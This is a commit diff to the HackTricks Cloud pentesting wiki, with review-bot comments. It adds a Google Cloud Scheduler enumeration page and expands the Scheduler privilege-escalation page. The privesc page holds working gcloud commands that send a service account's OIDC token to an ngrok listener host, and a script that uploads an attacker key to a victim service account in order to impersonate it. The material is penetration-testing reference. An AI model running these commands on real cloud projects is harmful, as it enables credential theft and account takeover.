GITBOOK-652: No subject
carlospolop authored and gitbook-bot committed Aug 6, 2024
1 parent 40c56f5 commit 344b9a6
Showing 4 changed files with 167 additions and 9 deletions.
Binary file added .gitbook/assets/image (347).png
3 changes: 2 additions & 1 deletion SUMMARY.md
@@ -100,7 +100,7 @@
* [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
* [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
* [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
* [GCP - Cloudscheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
* [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
* [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md)
* [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md)
* [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
@@ -149,6 +149,7 @@
* [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md)
* [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md)
* [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md)
* [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md)
* [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md)
* [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md)
* [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
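Review bot: the two hunks leave the slug convention split: the privesc entry is retitled "GCP - Cloud Scheduler Privesc" but still points at gcp-cloudscheduler-privesc.md, while the new enum entry uses gcp-cloud-scheduler-enum.md. Pick one form for both files; if the privesc file is renamed to match, this SUMMARY entry and the content-ref on the new enum page (`../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md`) have to change in the same commit or the link breaks.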
@@ -1,8 +1,8 @@
# GCP - Cloudscheduler Privesc
# GCP - Cloud Scheduler Privesc

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

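Review bot: the asset references move from the root-relative `/.gitbook/assets/image.png` to `../../../.gitbook/assets/image.png`. Three `../` levels match this file's location under pentesting-cloud/gcp-security/gcp-privilege-escalation/ as listed in SUMMARY.md, and it is the same form the new enum page uses, so the change is consistent; just note that the path is now tied to the file's depth and must be adjusted if the page is ever moved.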
@@ -15,29 +15,113 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" d
</details>
{% endhint %}

## cloudscheduler
## Cloud Scheduler

More information in:

{% content-ref url="../gcp-services/gcp-cloud-scheduler-enum.md" %}
[gcp-cloud-scheduler-enum.md](../gcp-services/gcp-cloud-scheduler-enum.md)
{% endcontent-ref %}

### `cloudscheduler.jobs.create` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)

An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command.

Example to create a new job that will use a specific Service Account to create a new Storage bucket on our behalf, we could run the following command:
* **Contact any google API via`googleapis.com` with OAuth token header**

Create a new Storage bucket:

{% code overflow="wrap" %}
```bash
gcloud scheduler jobs create http test schedule='* * * * *' uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com headers Content-Type=application/json
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
```
{% endcode %}

To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**

* **Exfiltrate OIDC service account token**

{% code overflow="wrap" %}
```bash
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']

# Listen in the ngrok address to get the OIDC token in clear text.
```
{% endcode %}

### `cloudscheduler.jobs.update` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)

Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:

{% code overflow="wrap" %}
```bash
gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']

# Listen in the ngrok address to get the OIDC token in clear text.
```
{% endcode %}

Another example to upload a private key to a SA and impersonate it:

{% code overflow="wrap" %}
```bash
# Generate local private key
openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
-keyout /tmp/private_key.pem \
-out /tmp/public_key.pem \
-subj "/CN=unused"

# Remove last new line character of the public key
file_size=$(wc -c < /tmp/public_key.pem)
new_size=$((file_size - 1))
truncate -s $new_size /tmp/public_key.pem

# Update scheduler to upload the key to a SA
gcloud scheduler jobs update http scheduler_lab_1 \
--schedule='* * * * *' \
--uri="https://iam.googleapis.com/v1/projects/$PROJECT_ID/serviceAccounts/victim@$PROJECT_ID.iam.gserviceaccount.com/keys:upload?alt=json" \
--message-body="{\"publicKeyData\": \"$(cat /tmp/public_key.pem | base64)\"}" \
--update-headers "Content-Type=application/json" \
--location us-central1 \
--oauth-service-account-email privileged@$PROJECT_ID.iam.gserviceaccount.com

# Check the logs to check it worked

# Build the json to contact the SA
## Get privatekey in json format
file_content=$(<"/tmp/private_key.pem")
private_key_json=$(jq -Rn --arg str "$file_content" '$str')

## Get ID of the generated key
gcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com

# Create the json in a file
{
"type": "service_account",
"project_id": "$PROJECT_ID",
"private_key_id": "<key id from key list>",
"private_key": "$private_key_json",
"client_email": "victim@$PROJECT_ID.iam.gserviceaccount.com",
"client_id": "$(gcloud iam service-accounts describe victim@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/victim%40$PROJECT_ID.iam.gserviceaccount.com",
"universe_domain": "googleapis.com"
}

# Activate the generated key
gcloud auth activate-service-account --key-file=/tmp/fake_key.json
```
{% endcode %}

## References

* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

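Review bot: the "Create the json in a file" step is a bare JSON literal: nothing redirects it into /tmp/fake_key.json, yet `gcloud auth activate-service-account --key-file=/tmp/fake_key.json` reads that path, and `"private_key": "$private_key_json"` wraps a value that `jq -Rn --arg str ... '$str'` has already JSON-quoted in a second pair of quotes, so the file would be invalid even if written; the block needs a heredoc to the file and the jq output inserted without surrounding quotes. Two documentation points as well: both OIDC examples hardcode a specific ngrok hostname in `--uri`, which should be a placeholder such as `<LISTENER-URL>` in the style of `<PROJECT-ID>` used in the bucket example, and `# Check the logs to check it worked` names no log; say which one (the job's execution log and the audit log entry for the key upload), since that is also exactly where an administrator reviewing the project will see the change.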
@@ -0,0 +1,73 @@
# GCP - Cloud Scheduler Enum

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Basic Information

Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.

Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.

At the moment of this writing these are the actions this service allows to schedule:

<figure><img src="../../../.gitbook/assets/image (347).png" alt="" width="563"><figcaption></figcaption></figure>

* **HTTP**: Send an HTTP request defining the headers and body of the request.
* **Pub/Sub**: Send a message into an specific topic
* **App Engine HTTP**: Send an HTTP request to an app built in App Engine
* **Workflows**: Call a GCP Workflow.

## Service Accounts

A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\
Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request.

{% hint style="danger" %}
Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page.
{% endhint %}

Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`.

## Enumeration

```bash
# Get schedulers in a location
gcloud scheduler jobs list --location us-central1

# Get information of an specific scheduler
gcloud scheduler jobs describe --location us-central1 <scheduler-name>
```

## Privilege Escalation

{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %}
[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
{% endcontent-ref %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
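Review bot: in the Service Accounts section, "indicate that some kind of auth is required by the workflow" is in the sentence about the plain HTTP type, so it should read "required by the target endpoint" to avoid confusion with the Workflows type discussed just before. The Enumeration block assumes us-central1; since the privesc page lists `cloudscheduler.locations.list` as a prerequisite, add `gcloud scheduler locations list` ahead of `gcloud scheduler jobs list --location ...` so jobs in other regions are not missed. The figure has an empty figcaption; a one-line caption naming the four target types keeps the page readable when the image does not load. Minor: "an specific" appears twice and should be "a specific".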
